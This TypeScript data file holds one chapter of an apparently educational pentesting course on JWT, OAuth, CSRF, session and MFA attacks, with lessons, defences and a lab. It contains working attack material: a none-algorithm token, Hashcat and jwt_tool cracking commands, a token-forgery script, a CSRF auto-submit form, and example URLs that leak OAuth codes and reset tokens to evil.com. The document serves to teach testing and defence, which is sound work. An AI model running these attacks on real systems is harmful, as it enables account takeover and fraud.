import { RoadmapChapter } from "./types";

export const chapter7: RoadmapChapter = {
  id: "ch-7-auth-jwt",
  chapterNumber: 7,
  title: "Advanced Authentication, Session Hijacking & JWT Exploitation",
  subtitle: "JSON Web Tokens (JWT), OAuth 2.0 Flaws, Cross-Site Request Forgery (CSRF) & MFA Bypasses",
  badge: "Chapter 7 • Identity & Access",
  duration: "18 Hours • 6 In-Depth Lessons",
  difficulty: "Advanced",
  description:
    "Break modern identity and session management systems. Master JSON Web Token (JWT) signature stripping (the 'none' algorithm), asymmetric key confusion attacks (RS256 to HS256), brute-forcing weak HMAC secrets with Hashcat, exploiting OAuth 2.0 redirect URI theft, defeating CSRF defenses across SameSite cookie configurations, and bypassing multi-factor authentication (MFA) logic.",
  iconName: "Award",
  lessons: [
    {
      id: "l-7-1",
      lessonNumber: "7.1",
      title: "JWT Architecture, None Algorithm & Signature Stripping",
      duration: "3 Hours",
      badge: "JWT Foundations",
      summary:
        "Anatomy of JSON Web Tokens (Header.Payload.Signature), exploiting signature verification bypasses via the 'none' algorithm, and tampering with embedded claims.",
      studyNotes: [
        {
          heading: "JSON Web Token (JWT) Internal Cryptographic Architecture",
          subheading: "How three base64url-encoded components authenticate stateless web sessions",
          points: [
            "The Three Segments: A JWT consists of three parts separated by dots (`.`): `Header.Payload.Signature`. Header: Specifies the token type (`typ: \"JWT\"`) and cryptographic signing algorithm (`alg: \"HS256\"` or `alg: \"RS256\"`). Payload: Contains the claims (e.g. `sub: \"12345\"`, `user: \"admin\"`, `role: \"admin\"`, `exp: 1716239000`). Signature: Generated by hashing the Header and Payload using the secret key.",
            "Stateless Authentication: Because the server verifies the cryptographic signature instead of querying a centralized Redis session database, tampering with ANY character in the payload will invalidate the signature — UNLESS the server has cryptographic verification flaws.",
            "The Notorious 'none' Algorithm Flaw: In early JWT implementations, libraries supported an algorithm named `none` for debugging purposes. If an attacker modifies the header to `{\"alg\": \"none\", \"typ\": \"JWT\"}`, changes their role in the payload to `\"admin\"`, and strips the signature completely (leaving the trailing dot `.` intact: `Header.Payload.`), vulnerable servers accept the token as 100% valid!",
            "Case Variations: Vulnerable libraries often block `none` in lowercase, but accept `None`, `NONE`, or `nOnE` due to naive case-sensitive string matching.",
          ],
          callout: "Always test the 'none' algorithm on every JWT you encounter. In Burp Suite, use the 'JSON Web Tokens' extension to automatically strip signatures and fuzz for algorithm bypasses.",
          diagramOrCode: `+-------------------------------------------------------------+
|               JSON WEB TOKEN (JWT) STRUCTURE                |
+-------------------------------------------------------------+
 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9   <-- HEADER (Base64url)
 .
 eyJ1c2VySWQiOjQyLCJyb2xlIjoidXNlciJ9   <-- PAYLOAD (Claims)
 .
 SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_... <-- SIGNATURE (HMAC-SHA256)

 EXPLOIT: THE 'NONE' ALGORITHM BYPASS:
 Modified Header:  {"alg": "none", "typ": "JWT"}
 Modified Payload: {"userId": 42, "role": "admin"}
 Resulting Token:  eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VySWQiOjQyLCJyb2xlIjoiYWRtaW4ifQ.`
        },
        {
          heading: "RS256 to HS256 Algorithm Confusion Key Flaw",
          subheading: "Tricking asymmetric signature validators using public keys as HMAC symmetric secrets",
          points: [
            "Asymmetric (RS256) vs Symmetric (HS256): In RS256, the authentication server signs tokens with a SECRET PRIVATE KEY; client applications verify tokens using a PUBLIC KEY (often published at `/.well-known/jwks.json`). In HS256, both signing and verification use the exact same SHARED SECRET.",
            "The Flaw: If the backend verification library accepts *both* RS256 and HS256, an attacker can obtain the server's public key from `/.well-known/jwks.json`, change the token header to `\"alg\": \"HS256\"`, and sign the tampered token using the server's PUBLIC KEY as the HMAC shared secret!",
            "Why it Succeeds: The backend server retrieves its configured key (which is the public key) and passes it to the HMAC function. Because HMAC hashes the payload using that exact same public key, the signature verifies perfectly, granting instant administrative access.",
            "Embedded JWK/JKU Header Injections: Attackers can also inject a malicious JWK (JSON Web Key) into the header (`\"jwk\": {...}`), pointing to their own public key, or tamper with the `jku` (JWK Set URL) parameter to point to an attacker-controlled server.",
          ],
          callout: "The RS256 to HS256 confusion attack is one of the most intellectually elegant cryptographic attacks in web security. It turns the server's public key (which is designed to be world-readable) against its own authentication logic.",
          diagramOrCode: `ALGORITHM CONFUSION (RS256 -> HS256) EXPLOITATION STEPS:
1. Download server's public RSA key from:
   https://target.com/.well-known/jwks.json
2. Convert key to standard PEM format:
   public_key.pem
3. Modify JWT header:
   {"alg": "HS256", "typ": "JWT"}
4. Modify JWT payload:
   {"user": "admin", "role": "superadmin"}
5. Sign the modified token using public_key.pem as HMAC secret:
   jwt_tool.py <token> -X a -pk public_key.pem`
        }
      ],
      keyTopics: [
        "JWT cryptographic anatomy: Base64url encoding, Header, Payload, and Signature",
        "The 'none' algorithm signature bypass and case sensitivity variations",
        "Algorithm Confusion attacks: Forcing RS256 asymmetric to HS256 symmetric validation",
        "Exploiting JWK, JKU, and KID header parameters for key injection",
      ],
      terminalCommands: [
        "python3 -m pip install jwt-tool",
        "python3 jwt_tool.py <TOKEN> -X a -pk public_key.pem",
        "python3 jwt_tool.py <TOKEN> -X b",
      ],
      proTips: [
        "Use `jwt_tool.py`: it automatically runs 14 distinct cryptographic attack vectors against any provided JWT token.",
        "Check the `kid` (Key ID) header in JWTs: if the server uses `kid` to look up the key file on disk, injecting `kid: ../../../dev/null` forces the secret to be an empty string!",
      ],
    },
    {
      id: "l-7-2",
      lessonNumber: "7.2",
      title: "Cracking Weak JWT HMAC Secrets with Hashcat",
      duration: "2.5 Hours",
      badge: "Cryptanalysis",
      summary:
        "Extracting weak symmetric HMAC-SHA256 signing keys using GPU-accelerated Hashcat dictionary attacks and forging arbitrary administrative tokens.",
      studyNotes: [
        {
          heading: "Why Symmetric JWTs are Vulnerable to Offline Cracking",
          subheading: "The mathematics of brute-forcing HMAC-SHA256 signatures offline",
          points: [
            "Offline Brute-Forcing: When an application uses HS256, anyone who receives a valid JWT possesses all three inputs needed to test secret guesses offline: Header, Payload, and Signature. You do not need to send a single network request to the target server!",
            "How Offline Cracking Works: Hashcat takes a word from your dictionary (e.g. `secret123`), hashes `Base64(Header) + \".\" + Base64(Payload)` using HMAC-SHA256 with that secret, and compares the result against the Signature. If the hashes match, the secret is cracked!",
            "Hashcat Mode 16500: Hashcat contains an ultra-optimized GPU kernel specifically for JWT tokens (Mode `-m 16500`). A modern RTX 4090 GPU can test over 2 billion JWT secret guesses per second.",
            "Common Weak Developer Secrets: Developers frequently use simplistic secrets like `secret`, `jwtsecret`, `targetcompany2026`, `changeme`, or the application's domain name.",
          ],
          callout: "Once you crack the symmetric secret key, you completely own the authentication mechanism. You can mint arbitrary JWT tokens on your local laptop, set your role to 'SuperAdmin', set expiration to year 2099, and the production server will accept it without question.",
          diagramOrCode: `+-------------------------------------------------------------+
|               OFFLINE GPU JWT CRACKING WORKFLOW             |
+-------------------------------------------------------------+
 Captured Token: eyJhbGciOi...eyJ1c2Vy...SflKxwRJSMeKKF2QT4f...
       |
       v (Save to jwt.txt)
 Hashcat Execution:
   hashcat -m 16500 jwt.txt /usr/share/wordlists/rockyou.txt -a 0
       |
       v (GPU tests 2,000,000,000 guesses per second)
 Cracking Result:
   eyJhbGciOi...:secretpassword123  ==> SECRET FOUND: "secretpassword123"!
       |
       v (Forge administrative token locally)
 Mint new token: role="superadmin", userId=1, signed with "secretpassword123"`
        },
        {
          heading: "Forging Arbitrary Administrative Tokens",
          subheading: "Constructing custom identity assertions once the secret is recovered",
          points: [
            "Token Construction: Using Python (`pyjwt`) or `jwt.io`, construct a new JSON payload with elevated rights: `{\"user\": \"admin\", \"is_admin\": true, \"account_id\": 1}`.",
            "Setting Long Expirations: Set the `exp` claim to `9999999999` to ensure your forged token never expires.",
            "Injecting into HTTP Headers: Add `Authorization: Bearer <forged_token>` into your Burp Suite Repeater requests.",
            "Defense Against Offline Cracking: Use cryptographically secure pseudorandom generators (CSPRNG) to create 256-bit or 512-bit signing secrets (at least 64 random characters), or transition to asymmetric RS256/ES256 keys.",
          ],
          callout: "Always check public GitHub repositories of the company for the signing secret. Developers often hardcode `const JWT_SECRET = \"super_secret_key\";` in public open-source frontend code by accident.",
          diagramOrCode: `PYTHON JWT FORGERY SCRIPT:
import jwt

secret = "secretpassword123"  # Cracked via Hashcat!
payload = {
    "userId": 1,
    "username": "admin",
    "role": "SuperAdministrator",
    "exp": 1999999999
}

token = jwt.encode(payload, secret, algorithm="HS256")
print("Forged Admin Token:\\n" + token)`
        }
      ],
      keyTopics: [
        "Offline cryptographic attacks against symmetric HMAC-SHA256 tokens",
        "Hashcat mode 16500 configuration and dictionary attack optimization",
        "Mining wordlists for corporate passwords and common framework defaults",
        "Forging custom administrative claims and weaponizing authentication tokens",
      ],
      terminalCommands: [
        "hashcat -m 16500 jwt.txt /usr/share/wordlists/rockyou.txt -a 0",
        "hashcat -m 16500 jwt.txt -a 3 ?l?l?l?l?l?d?d",
        "python3 -c 'import jwt; print(jwt.encode({\"role\":\"admin\"}, \"secret\", algorithm=\"HS256\"))'",
      ],
      proTips: [
        "Always test company-specific passwords: create a targeted wordlist using `cewl https://target.com` before running rockyou.txt.",
        "If Hashcat cracks the secret, use `jwt.io` to quickly forge tokens with arbitrary claims in your browser.",
      ],
    },
    {
      id: "l-7-3",
      lessonNumber: "7.3",
      title: "OAuth 2.0 & OpenID Connect (OIDC) Flow Vulnerabilities",
      duration: "3.5 Hours",
      badge: "OAuth Exploitation",
      summary:
        "Hijacking user accounts via OAuth 2.0 redirect URI theft, state parameter omission (OAuth CSRF), authorization code leakage, and token replay attacks.",
      studyNotes: [
        {
          heading: "The OAuth 2.0 Authorization Code Grant Flow",
          subheading: "Understanding the four-party dance between User, Client, Authorization Server, and Resource Server",
          points: [
            "Why OAuth 2.0 Exists: Allows users to grant third-party applications (Client) access to their account data on a service (Resource Server like Google, GitHub) without sharing their plaintext password.",
            "The Grant Flow Steps: 1. User clicks 'Login with Google'; 2. Browser redirects to Google with `client_id`, `redirect_uri`, and `scope`; 3. User authenticates with Google; 4. Google redirects browser back to Client's `redirect_uri` with a temporary `code` (`https://client.com/callback?code=AUTH_CODE`); 5. Client exchanges the `code` with Google for an `access_token` across a secure backend channel.",
            "Redirect URI Manipulation: If the authorization server fails to strictly match the `redirect_uri` against an exact whitelist, an attacker can tamper with it: `redirect_uri=https://client.com.evil.com/callback` or bypass via path traversal (`redirect_uri=https://client.com/oauth/callback/../../redirect?url=https://evil.com`).",
            "Stealing Authorization Codes: When the victim clicks the tampered link, Google redirects their authorization code straight to the attacker's server, allowing the attacker to claim the victim's account.",
          ],
          callout: "Account Takeover via Redirect URI: If you can steal an OAuth authorization code, you can link the victim's account to your own login session, achieving complete, unauthenticated account takeover with zero victim credentials.",
          diagramOrCode: `+-------------------------------------------------------------+
|               OAUTH 2.0 AUTHORIZATION CODE THEFT            |
+-------------------------------------------------------------+
 1. Attacker crafts malicious link:
    https://auth.target.com/oauth/authorize?
    client_id=123&
    redirect_uri=https://target.com/oauth/callback/../../evil.com&
    response_type=code
 
 2. Victim clicks link (already authenticated with target)
 
 3. Auth Server issues code to attacker's server:
    https://evil.com/?code=SPLxO2UyJYvMexWTtmJfgw
 
 4. Attacker exchanges stolen code for victim's account access!`
        },
        {
          heading: "OAuth CSRF & State Parameter Flaws",
          subheading: "Forcing victims to link attacker accounts to their identities",
          points: [
            "The Purpose of the `state` Parameter: A random cryptographic token generated by the client and validated upon callback to prevent Cross-Site Request Forgery.",
            "OAuth CSRF Exploitation: If the application fails to validate the `state` parameter, an attacker can initiate the OAuth flow, capture their own valid `code` from the callback URL, and trick a victim into visiting the callback URL containing the attacker's code (`https://client.com/callback?code=ATTACKER_CODE`).",
            "Account Linking Trap: The victim's browser completes the login, linking the ATTACKER'S Google profile to the VICTIM'S corporate account. When the attacker later logs in with their Google account, they land inside the victim's profile!",
            "Pre-Account Takeover: If an application allows users to register with email/password AND with OAuth, and fails to require email verification, an attacker registers with the victim's email first. When the victim logs in via Google, the accounts link automatically.",
          ],
          callout: "Always inspect whether the `state` parameter is present in OAuth requests. If `state` is missing or static across multiple sessions, an OAuth CSRF account linking vulnerability is present.",
          diagramOrCode: `OAUTH SECURITY VERIFICATION CHECKLIST:
  [ ] Is redirect_uri strictly validated against an exact whitelist?
  [ ] Does redirect_uri accept wildcards (*.target.com)?
  [ ] Can redirect_uri be traversed (../) to an open redirect?
  [ ] Is the 'state' parameter present and cryptographically unique per session?
  [ ] Are authorization codes single-use and short-lived (max 60 seconds)?`
        }
      ],
      keyTopics: [
        "OAuth 2.0 Authorization Code Grant and Implicit Grant flow mechanics",
        "Bypassing `redirect_uri` validation through parameter pollution and directory traversal",
        "OAuth CSRF account linking exploitation via missing `state` parameters",
        "Pre-account takeover and identity provider token leakage",
      ],
      terminalCommands: [
        "# Verify open redirect on target redirect_uri parameter:",
        "curl -I 'https://target.com/oauth/callback?redirect=https://attacker.com'",
      ],
      proTips: [
        "Test for open redirects on the client domain: chaining an open redirect with an OAuth flow allows stealing authorization codes even when regex whitelisting is active.",
        "Check if `response_type=token` (Implicit Flow) is accepted: implicit flows leak access tokens directly into the URL fragment `#access_token=...`.",
      ],
    },
    {
      id: "l-7-4",
      lessonNumber: "7.4",
      title: "Cross-Site Request Forgery (CSRF) & SameSite Cookie Bypasses",
      duration: "3 Hours",
      badge: "CSRF & Cookies",
      summary:
        "Forging state-changing HTTP requests across domains, exploiting misconfigured CORS headers, and bypassing modern browser SameSite cookie restrictions (Lax, Strict, None).",
      studyNotes: [
        {
          heading: "The Mechanics of Cross-Site Request Forgery (CSRF)",
          subheading: "Exploiting the browser's automatic credential transmission behavior",
          points: [
            "Root Cause: Browsers automatically include stored session cookies and authentication credentials with EVERY HTTP request made to a target domain, regardless of which website originated the request.",
            "The Attack Scenario: A victim logs into their banking website (`bank.com`). While still logged in, they visit a malicious website (`evil.com`). `evil.com` contains an auto-submitting HTML form targeting `bank.com/transfer`. Because the browser automatically attaches the victim's session cookie, the bank executes the transfer!",
            "Requirements for CSRF: 1. A state-changing action (e.g. changing password, transferring money); 2. Cookie-based session handling; 3. Zero unpredictable request parameters (no dynamic anti-CSRF tokens).",
            "Anti-CSRF Tokens: The standard defense. A cryptographically random secret token generated by the server and embedded in forms. The server verifies that the token submitted in the request body matches the token stored in the user's session.",
          ],
          callout: "CSRF does not allow an attacker to read server responses (due to the Same-Origin Policy). It is purely a state-changing attack that allows an attacker to execute actions on behalf of an authenticated victim.",
          diagramOrCode: `+-------------------------------------------------------------+
|               CROSS-SITE REQUEST FORGERY (CSRF) FLOW        |
+-------------------------------------------------------------+
 Victim logs into: bank.com (Session cookie stored in browser)
        |
        v
 Victim visits: evil.com (Attacker's malicious site)
        |
        v (Hidden auto-submitting HTML form executes)
 <form action="https://bank.com/api/transfer" method="POST">
   <input type="hidden" name="to" value="attacker" />
   <input type="hidden" name="amount" value="10000" />
 </form>
 <script>document.forms[0].submit();</script>
        |
        v
 Browser sends request to bank.com WITH victim's auth cookie!
 Result: $10,000 transferred to attacker without victim's knowledge!`
        },
        {
          heading: "SameSite Cookie Flags & Lax Bypass Tactics",
          subheading: "How modern browser cookie policies impact CSRF feasibility",
          points: [
            "SameSite=Strict: The cookie is NEVER sent in cross-site requests (even if a user clicks a link from Google or an external email). Complete protection against CSRF.",
            "SameSite=Lax (Modern Browser Default): Cookies are withheld on cross-site subrequests (images, AJAX `fetch()`, `POST` forms), BUT ARE SENT on top-level cross-site navigations using safe `GET` requests (clicking a link `<a href=\"...\">`).",
            "Bypassing SameSite=Lax via GET Method Tampering: If a state-changing API accepts `GET` requests instead of `POST` (e.g. `GET /api/change-email?email=evil@attacker.com`), an attacker can bypass SameSite=Lax simply by using an ordinary link `<a href=\"...\">`!",
            "The 2-Minute Lax Window: In Chromium-based browsers, cookies without an explicit SameSite attribute are treated as 'Lax', but for the first 120 seconds after creation, they are sent with top-level `POST` requests, creating an exploitation window.",
          ],
          callout: "Always test whether `POST` endpoints accept `GET` requests! Changing a `POST /user/update` request to a `GET /user/update?email=...` in Burp Repeater frequently works, instantly turning an unexploitable SameSite=Lax POST into a trivial CSRF exploit.",
          diagramOrCode: `SAMESITE COOKIE BEHAVIOR MATRIX:
  Request Type         | SameSite=None | SameSite=Lax | SameSite=Strict
  ---------------------|---------------|--------------|----------------
  Link (<a href>)      | Sends Cookie  | Sends Cookie | Blocked
  Form GET             | Sends Cookie  | Sends Cookie | Blocked
  Form POST            | Sends Cookie  | Blocked      | Blocked
  AJAX (fetch / XHR)   | Sends Cookie  | Blocked      | Blocked
  Image (<img src>)    | Sends Cookie  | Blocked      | Blocked`
        }
      ],
      keyTopics: [
        "Cross-Site Request Forgery mechanics and conditions for exploitation",
        "Generating weaponized HTML CSRF proof-of-concept forms in Burp Suite",
        "Analyzing SameSite cookie flags: `Strict`, `Lax`, and `None`",
        "Bypassing SameSite=Lax using HTTP verb tampering and client-side redirects",
      ],
      terminalCommands: [
        "# Testing CORS preflight headers for CSRF/XHR exploitability:",
        "curl -H 'Origin: https://evil.com' -I https://target.com/api/user",
      ],
      proTips: [
        "In Burp Suite Professional, right-click any request and select 'Engagement tools > Generate CSRF PoC' to automatically generate a weaponized HTML exploit page.",
        "Check if anti-CSRF token validation is skipped when the token parameter is completely deleted from the request body.",
      ],
    },
    {
      id: "l-7-5",
      lessonNumber: "7.5",
      title: "Session Fixation, Session Hijacking & Cookie Flags",
      duration: "2.5 Hours",
      badge: "Session Security",
      summary:
        "Auditing session cookie security: exploiting missing HttpOnly, Secure, and SameSite flags, executing session fixation attacks, and hijacking persistent sessions.",
      studyNotes: [
        {
          heading: "Session Lifecycle & Cryptographic Cookie Flags",
          subheading: "Protecting stateful authentication against theft and manipulation",
          points: [
            "The Three Critical Cookie Flags: 1. `HttpOnly` (prevents client-side JavaScript from accessing the cookie via `document.cookie`, mitigating XSS session theft); 2. `Secure` (instructs browsers to transmit the cookie strictly over encrypted TLS connections, preventing plaintext sniffing on public Wi-Fi); 3. `SameSite` (mitigates CSRF).",
            "Cookie Prefixes (`__Host-` and `__Secure-`): Modern browser standards that enforce security rules. A cookie named `__Host-session` MUST have `Secure`, MUST originate from HTTPS, MUST NOT have a `Domain` attribute, and MUST have `Path=/`.",
            "Session Fixation Mechanics: The application assigns a session ID to an anonymous visitor before login. After the user logs in, the application FAILS to regenerate the session ID. An attacker forces a known session ID onto the victim's browser (via link or meta tag), waits for them to log in, and uses the exact same session ID to take over the account.",
            "Session Invalidation Flaws: Many applications only delete the session cookie in the user's browser upon logout, but fail to invalidate the session record in the backend database. An attacker who captures the old token can continue using it indefinitely.",
          ],
          callout: "Always verify session regeneration upon privilege change. When logging in, when logging out, and when upgrading privileges (user -> admin), the application MUST issue a completely new, cryptographically random session token.",
          diagramOrCode: `+-------------------------------------------------------------+
|               SESSION FIXATION ATTACK FLOW                  |
+-------------------------------------------------------------+
 1. Attacker obtains anonymous session ID:
    SID = "ATTACKER_CHOSEN_ID_999"
 
 2. Attacker tricks victim into loading site with that ID:
    https://target.com/login?SID=ATTACKER_CHOSEN_ID_999
 
 3. Victim enters credentials and logs in.
    (VULNERABLE: Server authenticates SID_999 without regenerating!)
 
 4. Attacker uses SID_999 in their own browser:
    Cookie: session=ATTACKER_CHOSEN_ID_999
    Result: Attacker is immediately authenticated as the victim!`
        },
        {
          heading: "Session Hijacking Vectors & Post-Authentication Persistence",
          subheading: "How attackers maintain persistent access after credentials change",
          points: [
            "Man-in-the-Middle Wi-Fi Sniffing: If the `Secure` flag is missing, an attacker on the same local network (coffee shop Wi-Fi) can use Wireshark or Bettercap to capture the session cookie whenever the victim loads an unencrypted HTTP asset.",
            "Cross-Subdomain Cookie Tossing: If an attacker compromises a low-security subdomain (`blog.target.com`), they can set a cookie for the parent domain (`Domain=.target.com`), overriding the victim's session on `secure.target.com`.",
            "Concurrent Session Management: Testing whether the application allows simultaneous active sessions from different IP addresses or geographic regions without triggering re-authentication.",
            "Zombie Sessions: Testing whether old session tokens remain valid after a user changes their primary account password.",
          ],
          callout: "A critical severity audit check: Change your account password, then attempt to make an API request using a session cookie generated BEFORE the password change. If it succeeds, report a Failure to Invalidate Sessions on Password Reset.",
          diagramOrCode: `HARDENED SESSION COOKIE HEADER EXAMPLE:
Set-Cookie: __Host-id=v8k2...9m;
            Path=/;
            Secure;
            HttpOnly;
            SameSite=Strict;
            Max-Age=3600;`
        }
      ],
      keyTopics: [
        "Session cookie security flags: `HttpOnly`, `Secure`, `SameSite`, and `Domain` scope",
        "Modern cookie prefixes: `__Host-` and `__Secure-` validation rules",
        "Session Fixation attack mechanics and post-login token regeneration",
        "Testing session revocation upon logout and password change",
      ],
      terminalCommands: [
        "# Inspect raw Set-Cookie headers using cURL:",
        "curl -I https://target.com/login",
      ],
      proTips: [
        "Always test if session tokens expire after password changes; if old tokens remain valid, attackers can maintain persistence indefinitely.",
        "Check cookie `Domain` attributes: if set to `.target.com`, any compromised subdomain can read and overwrite the cookie for the main website.",
      ],
    },
    {
      id: "l-7-6",
      lessonNumber: "7.6",
      title: "Multi-Factor Authentication (MFA) & Password Reset Bypasses",
      duration: "3 Hours",
      badge: "MFA & Logic Bypasses",
      summary:
        "Bypassing Multi-Factor Authentication (MFA/2FA) through direct endpoint access, response manipulation (200 OK tampering), race conditions, and password reset token leakage.",
      studyNotes: [
        {
          heading: "MFA Implementation Flaws & Logic Bypasses",
          subheading: "How flawed business logic allows attackers to leapfrog two-factor gates",
          points: [
            "Forced Browsing / Direct Endpoint Access: After entering valid username and password, the server redirects to `/auth/2fa`. Instead of entering a code, navigate directly to `/dashboard` or `/account/settings`. If the backend sets the authenticated session cookie *before* 2FA validation, 2FA is completely bypassed!",
            "HTTP Response Manipulation: When entering an incorrect 2FA code (e.g. `000000`), the server replies with `{\"success\": false, \"message\": \"Invalid Code\"}` (HTTP 401). Intercept the response in Burp Suite and change it to `{\"success\": true, \"message\": \"Authorized\"}` (HTTP 200). Poorly coded frontend SPAs immediately redirect you into the dashboard!",
            "Brute-Forcing 4-Digit and 6-Digit OTPs: A 6-digit PIN has only 1,000,000 possibilities. If the application fails to enforce rate limiting on `/api/verify-otp`, a fast multithreaded Turbo Intruder script can crack the code in under 3 minutes before the 5-minute timeout expires.",
            "OAuth / Social Login Bypass: If 2FA is strictly enforced on standard email/password logins, test 'Sign in with Google' or 'Sign in with GitHub'. Developers frequently bypass 2FA checks for OAuth users under the assumption that the social provider already authenticated them.",
          ],
          callout: "Response Manipulation is the most common MFA bypass reported on HackerOne. Developers often write frontend code that simply checks `if (response.status === 200) { router.push('/dashboard'); }`, completely failing to verify the session on subsequent backend API calls.",
          diagramOrCode: `+-------------------------------------------------------------+
|               HTTP RESPONSE MANIPULATION MFA BYPASS         |
+-------------------------------------------------------------+
 Attacker enters fake 2FA code: "000000"
        |
        v
 Target Server returns:
   HTTP/1.1 401 Unauthorized
   {"status": "error", "message": "Invalid 2FA code"}
        |
        v [ Intercepted in Burp Proxy & Modified by Attacker ]
 Tampered Response delivered to browser:
   HTTP/1.1 200 OK
   {"status": "success", "message": "Authorized", "redirect": "/dashboard"}
        |
        v
 Frontend JavaScript loads authenticated dashboard! Full Bypass!`
        },
        {
          heading: "Password Reset Logic Flaws & Token Leakage",
          subheading: "Exploiting password recovery workflows to hijack accounts",
          points: [
            "Host Header Poisoning in Password Resets: When requesting a password reset, the server generates an email containing `https://{HOST}/reset?token=XYZ`. If the application uses the client-supplied `Host` header to construct this link, an attacker sends `Host: evil.com`. The victim receives a real email with a link pointing to `evil.com`, delivering their private reset token straight to the attacker!",
            "Token Leakage in Referer Headers: If the password reset page loads external third-party assets (like Google Analytics, Facebook Pixel, or external fonts), the browser automatically sends the full URL (including the reset token `?token=...`) in the `Referer` header to the third party.",
            "Weak Cryptographic PRNGs: Password reset tokens generated using predictable algorithms (`Math.random()` in JS or `rand()` in PHP) based on server timestamps can be calculated offline and used before the real user checks their inbox.",
            "Parameter Pollution in Reset Request: Submitting `email=victim@target.com&email=attacker@evil.com` to test if the backend issues the reset token for the victim's account to both email addresses.",
          ],
          callout: "Host Header Poisoning is a classic high-bounty bug. Always test password reset endpoints in Burp Repeater by modifying the `Host:` header to your Collaborator domain and checking if the server reflects it in the response or uses it in email generation.",
          diagramOrCode: `HOST HEADER POISONING PASSWORD RESET ATTACK:
Attacker Request:
  POST /auth/forgot-password HTTP/1.1
  Host: evil.com  <-- Spoofed Host Header!
  Content-Type: application/json
  
  {"email": "victim@company.com"}

Victim receives legitimate email from Company:
  "Click here to reset your password:
   https://evil.com/reset-password?token=secret12345"

Victim clicks link ===> Token sent to Attacker's server!`
        }
      ],
      keyTopics: [
        "Direct endpoint access and forced browsing past MFA validation gates",
        "HTTP response status code tampering (401 -> 200 OK) for client-side bypass",
        "Brute-forcing un-rate-limited 4-digit and 6-digit SMS/TOTP codes",
        "Password reset token theft via Host Header Poisoning and Referer leakage",
      ],
      terminalCommands: [
        "# Test Host header reflection on password reset endpoint:",
        "curl -H 'Host: evil.com' -X POST -d 'email=test@test.com' https://target.com/forgot-password",
      ],
      proTips: [
        "Always test entering an incorrect 2FA code, intercepting the HTTP response in Burp, and changing `401 Unauthorized` to `200 OK` with a JSON payload of `{\"success\":true}`.",
        "Check password reset links for token leakage in the `Referer` header when clicking external social media links on the reset page.",
      ],
    },
  ],
  handsOnLab: {
    title: "Lab 7: JWT Forgery & OAuth Account Takeover Simulation",
    target: "Modern Single-Page Application (SPA) with JWT & OAuth 2.0",
    goal: "Capture a low-privilege JWT, crack its HMAC signing key offline with Hashcat, forge an administrative token, and exploit an OAuth redirect URI flaw to hijack an executive account.",
    steps: [
      "1. Intercept your authentication token in Burp Suite and identify the algorithm in the header.",
      "2. Test for the 'none' algorithm by stripping the signature and modifying the role claim.",
      "3. Run Hashcat mode 16500 against the token using rockyou.txt to recover the shared secret.",
      "4. Mint a new JWT signed with the cracked secret granting SuperAdmin privileges.",
      "5. Inspect the OAuth authorization URL, identify a regex bypass on redirect_uri, and exfiltrate an authorization code.",
    ],
    verification: "Submit the cracked JWT secret, the forged administrative token, and the captured OAuth authorization code.",
  },
  checklist: [
    { id: "ch7-t1", label: "Deconstructed JWT architecture: Header, Payload claims, and cryptographic signatures" },
    { id: "ch7-t2", label: "Exploited the 'none' algorithm signature bypass and case-sensitivity flaws" },
    { id: "ch7-t3", label: "Executed RS256 to HS256 algorithm confusion using public keys as HMAC secrets" },
    { id: "ch7-t4", label: "Cracked weak symmetric JWT signing keys using GPU-accelerated Hashcat (Mode 16500)" },
    { id: "ch7-t5", label: "Forged administrative JSON Web Tokens and escalated privileges across REST APIs" },
    { id: "ch7-t6", label: "Exploited OAuth 2.0 redirect_uri flaws and missing state parameters for account takeover" },
    { id: "ch7-t7", label: "Weaponized Cross-Site Request Forgery (CSRF) and bypassed SameSite=Lax restrictions" },
    { id: "ch7-t8", label: "Bypassed Multi-Factor Authentication (MFA) via response manipulation and logic bypasses" },
  ],
};
